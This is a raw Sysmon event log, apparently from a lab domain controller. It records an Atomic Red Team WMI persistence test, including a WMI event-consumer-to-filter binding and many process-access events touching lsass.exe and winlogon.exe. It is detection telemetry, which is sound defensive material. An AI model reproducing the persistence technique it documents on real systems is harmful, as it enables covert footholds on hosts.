L+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005290Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005289Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005288Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005287Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005286Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005285Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005284Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005283Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005282Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005281Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005280Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005279Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005278Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.704{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 21342100x80000000000000005277Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-WmiBindingEvent2020-12-08 13:54:45.688CreatedATTACKRANGE\Administrator "\\\\.\\ROOT\\Subscription:CommandLineEventConsumer.Name=\"AtomicRedTeam-WMIPersistence-Example\"" "\\\\.\\ROOT\\Subscription:__EventFilter.Name=\"AtomicRedTeam-WMIPersistence-Example\"" 10341000x80000000000000005276Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.251{10ACEC4A-8541-5FCF-1000-000000009101}11564336C:\Windows\system32\svchost.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x101541C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+20fee|C:\Windows\system32\wbem\wmiprvsd.dll+43f7|C:\Windows\system32\wbem\wmiprvsd.dll+3ef6a|C:\Windows\system32\wbem\wmiprvsd.dll+1498a|C:\Windows\system32\wbem\wmiprvsd.dll+146e6|C:\Windows\system32\wbem\wmiprvsd.dll+140fe|C:\Windows\system32\wbem\wbemcore.dll+b920|C:\Windows\system32\wbem\wbemcore.dll+255ff|C:\Windows\system32\wbem\wbemcore.dll+24a9a|C:\Windows\system32\wbem\wbemcore.dll+2485e|C:\Windows\system32\wbem\wbemcore.dll+2685b|C:\Windows\system32\wbem\wbemcore.dll+22b78|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005275Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.235{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005274Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000005273Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005272Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005271Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005270Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005269Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005268Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005267Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005266Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:45.220{10ACEC4A-853E-5FCF-0B00-000000009101}864908C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000005265Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 